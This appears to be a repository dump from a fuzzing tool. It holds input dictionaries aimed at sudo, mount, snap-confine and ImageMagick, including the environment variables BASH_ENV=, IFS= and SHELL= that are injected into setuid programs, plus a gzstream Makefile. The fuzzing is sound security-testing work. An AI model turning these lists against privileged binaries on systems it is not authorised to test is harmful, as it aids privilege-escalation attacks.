--disable-accelerated-video 4 | --disable-background-mode 5 | --disable-gpu 6 | --disable-plugins 7 | --disable-plugins-discovery 8 | --disable-preconnect 9 | --disable-translate 10 | --dns-prefetch-disable 11 | --enable-kiosk-mode 12 | --incognito 13 | --media-cache-size 14 | --multi-profiles 15 | --new-profile-management 16 | --no-experiments 17 | --no-pings 18 | --no-referrers 19 | --purge-memory-button 20 | --reset-variation-state 21 | --restore-last-session 22 | --ssl-version-min 23 | --start-maximized 24 | --window-position 25 | --window-size 26 | -------------------------------------------------------------------------------- /examples/specific/flag_chars.txt: -------------------------------------------------------------------------------- 1 | -A 2 | -B 3 | -C 4 | -D 5 | -E 6 | -F 7 | -G 8 | -H 9 | -I 10 | -J 11 | -K 12 | -L 13 | -M 14 | -N 15 | -O 16 | -P 17 | -Q 18 | -R 19 | -S 20 | -T 21 | -U 22 | -V 23 | -W 24 | -X 25 | -Y 26 | -Z 27 | -a 28 | -b 29 | -c 30 | -d 31 | -e 32 | -f 33 | -g 34 | -h 35 | -i 36 | -j 37 | -k 38 | -l 39 | -m 40 | -n 41 | -o 42 | -p 43 | -q 44 | -r 45 | -s 46 | -t 47 | -u 48 | -v 49 | -w 50 | -x 51 | -y 52 | -z 53 | -0 54 | -1 55 | -2 56 | -3 57 | -4 58 | -5 59 | -6 60 | -7 61 | -8 62 | -9 63 | -------------------------------------------------------------------------------- /examples/specific/htmltags.txt: -------------------------------------------------------------------------------- 1 | > 2 | % 3 | " 4 | = 5 | 6 | - 7 | + 8 | 0 9 | 1 10 | 100% 11 | <A 12 | abbr 13 | accept 14 | accept-charset 15 | accesskey 16 | action 17 | advisory 18 | align 19 | alink 20 | all 21 | alt 22 | applet 23 | <APPLET 24 | application/x-www-form-urlencoded 25 | archive 26 | AREA 27 | auto 28 | axis 29 | <B 30 | background 31 | <BASE 32 | <BASEFONT 33 | <BDO 34 | bgcolor 35 | <BLOCKQUOTE 36 | <BODY 37 | border 38 | bottom 39 | <BR 40 | bullet 41 | button 42 | <BUTTON 43 | <CAPTION 44 | <CDATA 45 | cell 46 | cellpadding 47 | cellspacing 48 | center 49 
| char 50 | charoff 51 | charset 52 | checked 53 | cite 54 | class 55 | classid 56 | clear 57 | code 58 | codebase 59 | codetype 60 | <COL 61 | <COLGROUP 62 | color 63 | cols 64 | colspan 65 | column 66 | compact 67 | content 68 | coords 69 | data 70 | <DATA 71 | datetime 72 | declare 73 | default 74 | defer 75 | <DEL 76 | dir 77 | <DIR 78 | disabled 79 | <DIV 80 | <DL 81 | document 82 | enctype 83 | face 84 | field 85 | file 86 | focus 87 | <FONT 88 | for 89 | form 90 | <FORM 91 | frame 92 | <FRAME 93 | frameborder 94 | <FRAMESET 95 | GET 96 | <H1 97 | <H2 98 | <H3 99 | <H4 100 | <H5 101 | <H6 102 | <HEAD 103 | headers 104 | height 105 | <HR 106 | href 107 | hreflang 108 | hspace 109 | <HTML 110 | <HTTP 111 | http-equiv 112 | I 113 | id 114 | <ID 115 | <IDREF 116 | <IDREFS 117 | <IFRAME 118 | <IMG 119 | info 120 | <INPUT 121 | <INS 122 | <ISINDEX 123 | ismap 124 | item 125 | justify 126 | label 127 | LABEL 128 | lang 129 | language 130 | left 131 | <LEGEND 132 | length 133 | <LI 134 | link 135 | <LINK 136 | list 137 | loaded 138 | longdesc 139 | ltr 140 | <MAP 141 | marginheight 142 | marginwidth 143 | maxlength 144 | media 145 | <MENU 146 | message 147 | <META 148 | metainformation 149 | middle 150 | multiple 151 | name 152 | <NAME 153 | no 154 | nohref 155 | none 156 | noresize 157 | noshade 158 | nowrap 159 | number 160 | <NUMBER 161 | numbering 162 | object 163 | <OBJECT 164 | <OL 165 | onblur 166 | onchange 167 | onclick 168 | ondblclick 169 | onkeydown 170 | onkeyup 171 | onload 172 | onmousedown 173 | onmousemove 174 | onmouseout 175 | onmouseover 176 | onmouseup 177 | onreset 178 | onselect 179 | onsubmit 180 | onunload 181 | <OPTGROUP 182 | <OPTION 183 | order 184 | output 185 | <P 186 | <PARAM 187 | passwd 188 | <POST 189 | <PRE 190 | profile 191 | prompt 192 | <Q 193 | readonly 194 | <REF 195 | rel 196 | render 197 | reset 198 | right 199 | row 200 | rows 201 | rowspan 202 | rtl 203 | scheme 204 | <SCRIPT 205 | scrollbar 206 | scrolling 207 | select 208 
| <SELECT 209 | selected 210 | sequence 211 | serialized 212 | size 213 | span 214 | speech 215 | src 216 | standby 217 | starting 218 | style 219 | <STYLE 220 | submit 221 | summary 222 | suppress 223 | tabbing 224 | tabindex 225 | table 226 | <TABLE 227 | target 228 | <TBODY 229 | <TD 230 | text 231 | <TEXT 232 | <TEXTAREA 233 | <TFOOT 234 | <TH 235 | <THEAD 236 | title 237 | <TITLE 238 | top 239 | <TR 240 | type 241 | <UL 242 | usemap 243 | visible 244 | vlink 245 | width 246 | word 247 | wrap 248 | yes 249 | -------------------------------------------------------------------------------- /examples/specific/http.txt: -------------------------------------------------------------------------------- 1 | http:// 2 | https:// 3 | -------------------------------------------------------------------------------- /examples/specific/linux_syscalls.list: -------------------------------------------------------------------------------- 1 | accept 2 | accept4 3 | access 4 | acct 5 | add_key 6 | adjtimex 7 | afs_syscall 8 | alarm 9 | alloc_hugepages 10 | arch_prctl 11 | arm_fadvise 12 | arm_fadvise64_64 13 | arm_sync_file_range 14 | bdflush 15 | bind 16 | bpf 17 | break 18 | brk 19 | cacheflush 20 | capget 21 | capset 22 | chdir 23 | chmod 24 | chown 25 | chown32 26 | chroot 27 | clock_getres 28 | clock_gettime 29 | clock_nanosleep 30 | clock_settime 31 | __clone2 32 | clone2 33 | clone 34 | close 35 | connect 36 | creat 37 | create_module 38 | delete_module 39 | dup2 40 | dup 41 | dup3 42 | epoll_create1 43 | epoll_create 44 | epoll_ctl 45 | epoll_pwait 46 | epoll_wait 47 | eventfd2 48 | eventfd 49 | execve 50 | execveat 51 | _exit 52 | exit 53 | _Exit 54 | exit_group 55 | faccessat 56 | fadvise64 57 | fadvise64_64 58 | fallocate 59 | fanotify_init 60 | fanotify_mark 61 | fattach 62 | fchdir 63 | fchmod 64 | fchmodat 65 | fchown 66 | fchown32 67 | fchownat 68 | fcntl 69 | fcntl64 70 | fdatasync 71 | fdetach 72 | finit_module 73 | flock 74 | fork 75 | free_hugepages 76 | fstat 
77 | fstat64 78 | fstatat 79 | fstatat64 80 | fstatfs 81 | fstatfs64 82 | fstatvfs 83 | fsync 84 | ftruncate 85 | ftruncate64 86 | futex 87 | futimesat 88 | getcontext 89 | getcpu 90 | getcwd 91 | getdents 92 | getdents64 93 | getdomainname 94 | getdtablesize 95 | getegid 96 | getegid32 97 | geteuid 98 | geteuid32 99 | getgid 100 | getgid32 101 | getgroups 102 | getgroups32 103 | gethostid 104 | gethostname 105 | getitimer 106 | get_kernel_syms 107 | get_mempolicy 108 | getmsg 109 | getpagesize 110 | getpeername 111 | getpgid 112 | getpgrp 113 | getpid 114 | getpmsg 115 | getppid 116 | getpriority 117 | getrandom 118 | getresgid 119 | getresgid32 120 | getresuid 121 | getresuid32 122 | getrlimit 123 | get_robust_list 124 | getrusage 125 | getsid 126 | getsockname 127 | getsockopt 128 | get_thread_area 129 | gettid 130 | gettimeofday 131 | getuid 132 | getuid32 133 | getunwind 134 | gtty 135 | idle 136 | inb 137 | inb_p 138 | init_module 139 | inl 140 | inl_p 141 | inotify_add_watch 142 | inotify_init1 143 | inotify_init 144 | inotify_rm_watch 145 | insb 146 | insl 147 | insw 148 | intro 149 | inw 150 | inw_p 151 | io_cancel 152 | ioctl 153 | ioctl_fat 154 | ioctl_list 155 | io_destroy 156 | io_getevents 157 | ioperm 158 | iopl 159 | ioprio_get 160 | ioprio_set 161 | io_setup 162 | io_submit 163 | ipc 164 | isastream 165 | kcmp 166 | kexec_file_load 167 | kexec_load 168 | keyctl 169 | kill 170 | killpg 171 | lchown 172 | lchown32 173 | link 174 | linkat 175 | listen 176 | _llseek 177 | llseek 178 | lock 179 | lookup_dcookie 180 | lseek 181 | lstat 182 | lstat64 183 | madvise1 184 | madvise 185 | mbind 186 | membarrier 187 | memfd_create 188 | migrate_pages 189 | mincore 190 | mkdir 191 | mkdirat 192 | mknod 193 | mknodat 194 | mlock2 195 | mlock 196 | mlockall 197 | mmap2 198 | mmap 199 | modify_ldt 200 | mount 201 | move_pages 202 | mprotect 203 | mpx 204 | mq_getsetattr 205 | mq_notify 206 | mq_open 207 | mq_timedreceive 208 | mq_timedsend 209 | mq_unlink 210 | 
mremap 211 | msgctl 212 | msgget 213 | msgop 214 | msgrcv 215 | msgsnd 216 | msync 217 | munlock 218 | munlockall 219 | munmap 220 | name_to_handle_at 221 | nanosleep 222 | newfstatat 223 | _newselect 224 | nfsservctl 225 | nice 226 | oldfstat 227 | oldlstat 228 | oldolduname 229 | oldstat 230 | olduname 231 | open 232 | openat 233 | open_by_handle_at 234 | outb 235 | outb_p 236 | outl 237 | outl_p 238 | outsb 239 | outsl 240 | outsw 241 | outw 242 | outw_p 243 | pause 244 | pciconfig_iobase 245 | pciconfig_read 246 | pciconfig_write 247 | perf_event_open 248 | perfmonctl 249 | personality 250 | phys 251 | pipe2 252 | pipe 253 | pivot_root 254 | poll 255 | posix_fadvise 256 | ppoll 257 | prctl 258 | pread 259 | pread64 260 | preadv 261 | prlimit 262 | prlimit64 263 | process_vm_readv 264 | process_vm_writev 265 | prof 266 | pselect 267 | pselect6 268 | ptrace 269 | putmsg 270 | putpmsg 271 | pwrite 272 | pwrite64 273 | pwritev 274 | query_module 275 | quotactl 276 | read 277 | readahead 278 | readdir 279 | readlink 280 | readlinkat 281 | readv 282 | reboot 283 | recv 284 | recvfrom 285 | recvmmsg 286 | recvmsg 287 | remap_file_pages 288 | rename 289 | renameat2 290 | renameat 291 | request_key 292 | restart_syscall 293 | rmdir 294 | rt_sigaction 295 | rt_sigpending 296 | rt_sigprocmask 297 | rt_sigqueueinfo 298 | rt_sigreturn 299 | rt_sigsuspend 300 | rt_sigtimedwait 301 | rt_tgsigqueueinfo 302 | s390_pci_mmio_read 303 | s390_pci_mmio_write 304 | s390_runtime_instr 305 | sbrk 306 | sched_getaffinity 307 | sched_getattr 308 | sched_getparam 309 | sched_get_priority_max 310 | sched_get_priority_min 311 | sched_getscheduler 312 | sched_rr_get_interval 313 | sched_setaffinity 314 | sched_setattr 315 | sched_setparam 316 | sched_setscheduler 317 | sched_yield 318 | seccomp 319 | security 320 | select 321 | select_tut 322 | semctl 323 | semget 324 | semop 325 | semtimedop 326 | send 327 | sendfile 328 | sendfile64 329 | sendmmsg 330 | sendmsg 331 | sendto 332 | 
setcontext 333 | setdomainname 334 | setegid 335 | seteuid 336 | setfsgid 337 | setfsgid32 338 | setfsuid 339 | setfsuid32 340 | setgid 341 | setgid32 342 | setgroups 343 | setgroups32 344 | sethostid 345 | sethostname 346 | setitimer 347 | set_mempolicy 348 | setns 349 | setpgid 350 | setpgrp 351 | setpriority 352 | setregid 353 | setregid32 354 | setresgid 355 | setresgid32 356 | setresuid 357 | setresuid32 358 | setreuid 359 | setreuid32 360 | setrlimit 361 | set_robust_list 362 | setsid 363 | setsockopt 364 | set_thread_area 365 | set_tid_address 366 | settimeofday 367 | setuid 368 | setuid32 369 | setup 370 | sgetmask 371 | shmat 372 | shmctl 373 | shmdt 374 | shmget 375 | shmop 376 | shutdown 377 | sigaction 378 | sigaltstack 379 | signal 380 | signalfd 381 | signalfd4 382 | sigpending 383 | sigprocmask 384 | sigqueue 385 | sigreturn 386 | sigsuspend 387 | sigtimedwait 388 | sigwaitinfo 389 | socket 390 | socketcall 391 | socketpair 392 | splice 393 | spu_create 394 | spu_run 395 | ssetmask 396 | stat 397 | stat64 398 | statfs 399 | statfs64 400 | statvfs 401 | stime 402 | stty 403 | subpage_prot 404 | swapoff 405 | swapon 406 | symlink 407 | symlinkat 408 | sync 409 | sync_file_range2 410 | sync_file_range 411 | syncfs 412 | _syscall 413 | syscall 414 | syscalls 415 | _sysctl 416 | sysctl 417 | sysfs 418 | sysinfo 419 | syslog 420 | tee 421 | tgkill 422 | time 423 | timer_create 424 | timer_delete 425 | timerfd_create 426 | timerfd_gettime 427 | timerfd_settime 428 | timer_getoverrun 429 | timer_gettime 430 | timer_settime 431 | times 432 | tkill 433 | truncate 434 | truncate64 435 | tuxcall 436 | ugetrlimit 437 | umask 438 | umount2 439 | umount 440 | uname 441 | unimplemented 442 | unlink 443 | unlinkat 444 | unshare 445 | uselib 446 | ustat 447 | utime 448 | utimensat 449 | utimes 450 | vfork 451 | vhangup 452 | vm86 453 | vm86old 454 | vmsplice 455 | vserver 456 | wait 457 | wait3 458 | wait4 459 | waitid 460 | waitpid 461 | write 462 | writev 463 | 
-------------------------------------------------------------------------------- /examples/specific/linux_syscalls_implemented.list: -------------------------------------------------------------------------------- 1 | accept 2 | accept4 3 | access 4 | acct 5 | alarm 6 | bind 7 | bpf 8 | capget 9 | capset 10 | chdir 11 | chmod 12 | chroot 13 | clock_getres 14 | clock_gettime 15 | clock_nanosleep 16 | clock_settime 17 | clone 18 | connect 19 | dup 20 | dup2 21 | dup3 22 | epoll_create 23 | epoll_create1 24 | epoll_ctl 25 | epoll_pwait 26 | epoll_wait 27 | eventfd 28 | faccessat 29 | fallocate 30 | fanotify_init 31 | posix_fadvise 32 | fchdir 33 | fchmodat 34 | fchown 35 | fchownat 36 | fdatasync 37 | flock 38 | fstat 39 | fstatat 40 | fstatfs 41 | fsync 42 | ftruncate 43 | futimesat 44 | getcwd 45 | getegid 46 | getgid 47 | -------------------------------------------------------------------------------- /examples/specific/math.txt: -------------------------------------------------------------------------------- 1 | 2 | + 3 | - 4 | * 5 | / 6 | -------------------------------------------------------------------------------- /examples/specific/mogrify_t.txt: -------------------------------------------------------------------------------- 1 | -affine 2 | -alpha 3 | -antialias 4 | -authenticate 5 | -attenuate 6 | -background 7 | -bias 8 | -black-point-compensation 9 | -blue-primary 10 | -bordercolor 11 | -caption 12 | -cdl 13 | -channel 14 | -colors 15 | -colorspace 16 | -comment 17 | -compose 18 | -compress 19 | -decipher 20 | -define 21 | -delay 22 | -density 23 | -depth 24 | -direction 25 | -display 26 | -dispose 27 | -dither 28 | -encipher 29 | -encoding 30 | -endian 31 | -family 32 | -features 33 | -fill 34 | -filter 35 | -flatten 36 | -font 37 | -format 38 | -function 39 | -fuzz 40 | -gravity 41 | -green-primary 42 | -intensity 43 | -intent 44 | -interlace 45 | -interline-spacing 46 | -interpolate 47 | -interword-spacing 48 | -kerning 49 | -label 50 | -limit 51 | 
-loop 52 | -mask 53 | -matte 54 | -mattecolor 55 | -metric 56 | -monitor 57 | -morphology 58 | -orient 59 | -page 60 | -path 61 | -ping 62 | -pointsize 63 | -precision 64 | -preview 65 | -quality 66 | -quiet 67 | -red-primary 68 | -regard-warnings 69 | -remap 70 | -respect-parentheses 71 | -sampling-factor 72 | -scene 73 | -seed 74 | -size 75 | -stretch 76 | -stroke 77 | -strokewidth 78 | -style type 79 | -synchronize 80 | -taint 81 | -texture 82 | -tile-offset 83 | -treedepth 84 | -transparent-color 85 | -undercolor 86 | -units 87 | -verbose 88 | -view 89 | -virtual-pixel 90 | -weight 91 | -white-point 92 | -adaptive-blur 93 | -adaptive-resize 94 | -adaptive-sharpen 95 | -alpha 96 | -annotate 97 | -auto-gamma 98 | -auto-level 99 | -auto-orient 100 | -bench iterations 101 | -black-threshold 102 | -blue-shift 103 | -blur 104 | -border 105 | -bordercolor 106 | -brightness-contrast 107 | -cdl 108 | -canny 109 | -charcoal 110 | -chop 111 | -clamp 112 | -clip 113 | -clip-mask 114 | -clip-path 115 | -colorize 116 | -color-matrix 117 | -connected-component 118 | -contrast 119 | -contrast-stretch 120 | -convolve 121 | -cycle 122 | -decipher 123 | -deskew 124 | -despeckle 125 | -distort 126 | -draw 127 | -edge 128 | -encipher 129 | -emboss 130 | -enhance 131 | -equalize 132 | -evaluate 133 | -extent 134 | -extract 135 | -features 136 | -fft 137 | -flip 138 | -floodfill 139 | -flop 140 | -frame 141 | -function 142 | -gamma 143 | -gaussian-blur 144 | -geometry 145 | -grayscale 146 | -ift 147 | -hough-lines 148 | -identify 149 | -ift 150 | -implode 151 | -lat 152 | -layers 153 | -level 154 | -level-colors 155 | -linear-stretch 156 | -liquid-rescale 157 | -magnify 158 | -mean-shift 159 | -median 160 | -mode 161 | -modulate 162 | -monochrome 163 | -morphology 164 | -motion-blur 165 | -negate 166 | -noise 167 | -normalize 168 | -opaque 169 | -ordered-dither 170 | -paint 171 | -perceptible 172 | -polaroid 173 | -posterize 174 | -print 175 | -profile 176 | -quantize 177 | 
-radial-blur 178 | -raise 179 | -random-threshold 180 | -region 181 | -render 182 | -repage 183 | -resample 184 | -resize 185 | -roll 186 | -rotate 187 | -sample 188 | -scale 189 | -segment 190 | -selective-blur 191 | -sepia-tone 192 | -set property 193 | -shade degrees 194 | -shadow 195 | -sharpen 196 | -shave 197 | -shear 198 | -sigmoidal-contrast 199 | -sketch 200 | -solarize 201 | -sparse-color 202 | -splice 203 | -spread 204 | -statistic 205 | -strip 206 | -swirl 207 | -threshold 208 | -thumbnail 209 | -tile 210 | -tint 211 | -transform 212 | -transparent 213 | -transpose 214 | -transverse 215 | -trim 216 | -type 217 | -unique-colors 218 | -unsharp 219 | -vignette 220 | -wave 221 | -white-threshold 222 | -affinity 223 | -append 224 | -clut 225 | -coalesce 226 | -combine 227 | -compare 228 | -complex 229 | -composite 230 | -crop 231 | -deconstruct 232 | -evaluate-sequence 233 | -flatten 234 | -fx 235 | -hald-clut 236 | -morph 237 | -mosaic 238 | -poly 239 | -process 240 | -separate 241 | -smush 242 | -delete 243 | -duplicate 244 | -insert 245 | -reverse 246 | -swap 247 | -debug 248 | -distribute-cache 249 | -log 250 | -list 251 | -------------------------------------------------------------------------------- /examples/specific/mount_e.txt: -------------------------------------------------------------------------------- 1 | LANG= 2 | LANGUAGE= 3 | BASH_ENV= 4 | HOME= 5 | IFS= 6 | KRB_CONF= 7 | LIBPATH= 8 | MAIL= 9 | NLSPATH= 10 | SHELL= 11 | SHLIB_PATH= 12 | -------------------------------------------------------------------------------- /examples/specific/mount_o.txt: -------------------------------------------------------------------------------- 1 | remount 2 | ro 3 | bind 4 | adfs 5 | affs 6 | autofs 7 | btrfs 8 | cifs 9 | coda 10 | coherent 11 | cramfs 12 | debugfs 13 | devpts 14 | efs 15 | ext 16 | ext2 17 | ext3 18 | ext4 19 | hfs 20 | hfsplus 21 | hpfs 22 | iso9660 23 | jfs 24 | minix 25 | msdos 26 | ncpfs 27 | nfs 28 | nfs4 29 | ntfs 30 | proc 31 | 
qnx4 32 | ramfs 33 | reiserfs 34 | romfs 35 | squashfs 36 | smbfs 37 | sysv 38 | tmpfs 39 | ubifs 40 | udf 41 | ufs 42 | umsdos 43 | usbfs 44 | vfat 45 | xenix 46 | xfs 47 | xiafs 48 | nomsdos 49 | no_netdev 50 | _netdev 51 | noatime 52 | nodev 53 | nosuid 54 | async 55 | noauto 56 | atime 57 | noatime 58 | noauto 59 | context= 60 | fscontext= 61 | defcontext= 62 | rootcontext= 63 | defaults 64 | dev 65 | nodev 66 | diratime 67 | nodiratime 68 | dirsync 69 | exec 70 | noexec 71 | group 72 | iversion 73 | noiversion 74 | mand 75 | nomand 76 | _netdev 77 | nofail 78 | relatime 79 | strictatime 80 | nostrictatime 81 | suid 82 | nosuid 83 | silent 84 | loud 85 | owner 86 | remount 87 | ro 88 | rw 89 | user 90 | nouser 91 | users 92 | uid= 93 | ownmask= 94 | gid= 95 | othmask= 96 | suid= 97 | setgid= 98 | mode= 99 | protect 100 | usemp 101 | verbose 102 | prefix= 103 | volume= 104 | reserved= 105 | root= 106 | bs= 107 | grpquota 108 | noquota 109 | quota 110 | usrquota 111 | alloc_start= 112 | autodefrag 113 | check_int= 114 | check_int_data= 115 | check_int_print_mask= 116 | commit= 117 | compress 118 | compress= 119 | zlib 120 | lzo 121 | no 122 | compress-force 123 | compress-force= 124 | degraded 125 | device= 126 | discard 127 | enospc_debug 128 | fatal_errors= 129 | flushoncommit 130 | inode_cache 131 | max_inline= 132 | metadata_ratio= 133 | noacl 134 | nobarrier 135 | nodatacow 136 | nodatasum 137 | notreelog 138 | recovery 139 | rescan_uuid_tree 140 | scip_balance 141 | nospace_cache 142 | ssd 143 | nossd 144 | ssd_spread 145 | subvol= 146 | subvolid= 147 | subvolrootid= 148 | thread_pool= 149 | user_subvol_rm_allowed 150 | newinstance 151 | ptmxmode= 152 | bsddf 153 | minixdf 154 | check= 155 | none 156 | nocheck 157 | debug 158 | errors= 159 | continue 160 | remount-ro 161 | panic 162 | grpid 163 | gsdgroups 164 | nogrpid 165 | sysvgroups 166 | resgid= 167 | resuid= 168 | sb= 169 | user_xattr 170 | nouser_xattr 171 | journal= 172 | update 173 | inum 174 | 
journal_dev 175 | norecovery 176 | noload 177 | ordered 178 | writeback 179 | data= 180 | data_err 181 | ignore 182 | abort 183 | barrier=1 184 | barrier=0 185 | barrier= 186 | commit= 187 | oldalloc 188 | sysvgroups 189 | usrjquota 190 | grpjquota 191 | orlov 192 | nobarrier 193 | barrier 194 | inode_readahead_blks= 195 | stripe= 196 | dealloc 197 | nodealloc 198 | max_bath_time= 199 | min_batch_time= 200 | journal_ioprio= 201 | abort 202 | auto_da_alloc 203 | noauto_da_alloc 204 | noinit_itable 205 | init_itable= 206 | nouid32 207 | block_validity 208 | noblock_validity 209 | max_dir_size_kb= 210 | i_version 211 | blocksize= 212 | uid= 213 | umask= 214 | dmask= 215 | fmask= 216 | allow_utime= 217 | check= 218 | r 219 | n 220 | s 221 | codepage= 222 | conv= 223 | b 224 | t 225 | a 226 | cvf_format= 227 | cvf_option= 228 | fat 229 | iocharset= 230 | nfs 231 | tz=UTC 232 | quiet 233 | showexec 234 | sys_immutable 235 | flush 236 | usefree 237 | dots 238 | nodots 239 | dotsOK= 240 | yes 241 | no 242 | creator= 243 | type= 244 | session= 245 | part= 246 | case= 247 | lower 248 | asis 249 | norock 250 | nojoliet 251 | map= 252 | n 253 | o 254 | unhide 255 | block= 256 | conv= 257 | m 258 | t 259 | cruft 260 | absector= 261 | iocharset= 262 | utf8 263 | resize= 264 | nointegrity 265 | integrity 266 | posix=0 267 | posix=1 268 | posix= 269 | uni_xlate=1 270 | uni_xlate=2 271 | uni_xlate=3 272 | uni_xlate= 273 | hash 274 | rupasov 275 | tea 276 | r5 277 | detect 278 | hash_relocation 279 | no_unhashed_relocation 280 | noborder 281 | nolog 282 | notail 283 | replayonly 284 | acl 285 | user_xattr 286 | barrier= 287 | none 288 | flush 289 | size= 290 | nr_blocks= 291 | nr_inodes= 292 | mode= 293 | mpol 294 | prefer:Node 295 | bind:NodeList 296 | interleave 297 | interleave:NodeList 298 | bulk_read 299 | no_bulk_read 300 | chk_data_crc 301 | no_chk_data_crc 302 | compr= 303 | bs= 304 | partition= 305 | lastblock= 306 | fileset= 307 | rootdir= 308 | ufstype= 309 | 44bsd 310 | 
old 311 | ufs2 312 | 5xbsd 313 | sun 314 | sunx86 315 | hp 316 | nextstep 317 | nextsetp-cd 318 | openstep 319 | onerror= 320 | uni_xlate 321 | shortname= 322 | win95 323 | winnt 324 | mixed 325 | attr2 326 | noattr2 327 | largeio 328 | nolargeio 329 | logbufs= 330 | logbsize= 331 | logdev= 332 | noalign 333 | nouuid 334 | pquota 335 | prjquota 336 | pqnoenforce 337 | sunit= 338 | swidth= 339 | swolloc 340 | wsync 341 | loop 342 | -------------------------------------------------------------------------------- /examples/specific/mount_t.txt: -------------------------------------------------------------------------------- 1 | --bind 2 | --fstab 3 | --source 4 | --target 5 | -F 6 | -O 7 | -a 8 | -f 9 | -o 10 | -r 11 | -t 12 | -v 13 | -i 14 | -l 15 | -c 16 | -s 17 | -a 18 | --source 19 | --target 20 | -r 21 | -w 22 | --rw 23 | --read-write 24 | -U 25 | -T 26 | -t 27 | --make-rshared 28 | --make-rslave 29 | --make-rprivate 30 | --make-runbindable 31 | -B 32 | -R 33 | -M 34 | -------------------------------------------------------------------------------- /examples/specific/networking.txt: -------------------------------------------------------------------------------- 1 | 192.168.0.1 2 | 127.0.0.1 3 | 0.0.0.0 4 | 8.8.8.8 5 | ipv4 6 | ipv6 7 | -------------------------------------------------------------------------------- /examples/specific/sample.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/examples/specific/sample.gif -------------------------------------------------------------------------------- /examples/specific/sample.mkv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/examples/specific/sample.mkv -------------------------------------------------------------------------------- 
/examples/specific/snap-confine_e.txt: -------------------------------------------------------------------------------- 1 | SNAP_CONFINE_DEBUG= 2 | SNAP_LAUNCHER_INSIDE_TESTS= 3 | SNAP_CONFINE_NO_ROOT= 4 | SNAPPY_LAUNCHER_SECCOMP_PROFILE_DIR= 5 | SNAP_USER_DATA= 6 | SNAP_CONFINE_NS_DIR= 7 | -------------------------------------------------------------------------------- /examples/specific/snap-profile: -------------------------------------------------------------------------------- 1 | snap.a. 2 | -------------------------------------------------------------------------------- /examples/specific/space.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /examples/specific/sudo.txt: -------------------------------------------------------------------------------- 1 | -A 2 | -B 3 | -C 4 | -E 5 | -e 6 | -g 7 | -H 8 | -h 9 | -i 10 | -K 11 | -k 12 | -l 13 | -n 14 | -P 15 | -p 16 | -r 17 | -S 18 | -s 19 | -t 20 | -U 21 | -u 22 | -V 23 | -v 24 | -------------------------------------------------------------------------------- /examples/specific/test-win.txt: -------------------------------------------------------------------------------- 1 | --test-win -------------------------------------------------------------------------------- /icons/icon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/icons/icon.ico -------------------------------------------------------------------------------- /icons/icon.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/icons/icon.jpg -------------------------------------------------------------------------------- /include/gzstream/.deps/.dirstamp: 
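--------------------------------------------------------------------------------
https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/include/gzstream/.deps/.dirstamp
--------------------------------------------------------------------------------
/include/gzstream/.dirstamp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/include/gzstream/.dirstamp
--------------------------------------------------------------------------------
/include/gzstream/.gitignore:
--------------------------------------------------------------------------------
*.[oa]

--------------------------------------------------------------------------------
/include/gzstream/Makefile:
--------------------------------------------------------------------------------
# ============================================================================
# gzstream, C++ iostream classes wrapping the zlib compression library.
# Copyright (C) 2001 Deepak Bandyopadhyay, Lutz Kettner
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# ============================================================================
#
# File : Makefile
# Revision : $Revision: 1.3 $
# Revision_date : $Date: 2001/10/04 15:09:28 $
# Author(s) : Deepak Bandyopadhyay, Lutz Kettner
#
# ============================================================================

# ----------------------------------------------------------------------------
# adapt these settings to your need:
# add '-DGZSTREAM_NAMESPACE=name' to CPPFLAGS to place the classes
# in its own namespace. Note, this macro needs to be set while creating
# the library as well while compiling applications based on it.
# As an alternative, gzstream.C and gzstream.h can be edited.
# ----------------------------------------------------------------------------

# CXX = CC -n32 -LANG:std # for SGI Irix 6.5, MIPSpro CC version 7.30
CXX = g++ # for Linux RedHat 6.1, g++ version 2.95.2

# __KALI__ makes gzstream.cpp include "./gzstream.h" instead of the
# project-relative "include/gzstream/gzstream.h".
CPPFLAGS = -I. -O -D __KALI__
LDFLAGS = -L. -lgzstream -lz
AR = ar cr

# ----------------------------------------------------------------------------
# plain simple rules to make and cleanup the library:
# make default; compiles the library
# make test; compiles and executes test. O.K. message marks success.
# make clean; removes temporary files
# make cleanall; removes temporary files, the library, and programs
# ----------------------------------------------------------------------------

# None of these targets names a file that the rule creates; declaring them
# phony keeps a stray file called "test" or "clean" from masking the rule.
.PHONY: all test clean cleanall

all: libgzstream.a

# Round-trips COPYING.LIB through both test programs and the system
# gzip/gunzip; any diff or non-zero exit status aborts the rule.
test: test_gzip test_gunzip
	./test_gzip COPYING.LIB gz.tmp.gz
	gunzip gz.tmp.gz
	diff COPYING.LIB gz.tmp
	gzip gz.tmp
	./test_gunzip gz.tmp.gz gz.tmp
	diff COPYING.LIB gz.tmp
	rm gz.tmp.gz gz.tmp
	# *** O.K. Test finished successfully. ***

gzstream.o : gzstream.cpp gzstream.h
	${CXX} ${CPPFLAGS} -c -o gzstream.o gzstream.cpp

test_gzip.o : test_gzip.C gzstream.h
	${CXX} ${CPPFLAGS} -c -o test_gzip.o test_gzip.C

test_gunzip.o : test_gunzip.C gzstream.h
	${CXX} ${CPPFLAGS} -c -o test_gunzip.o test_gunzip.C

# The archive is also copied two directories up, where the enclosing
# project's build presumably links against it.
libgzstream.a : gzstream.o
	${AR} libgzstream.a gzstream.o
	cp libgzstream.a ../../

test_gzip : test_gzip.o libgzstream.a
	${CXX} -o test_gzip test_gzip.o ${LDFLAGS}

test_gunzip : test_gunzip.o libgzstream.a
	${CXX} -o test_gunzip test_gunzip.o ${LDFLAGS}

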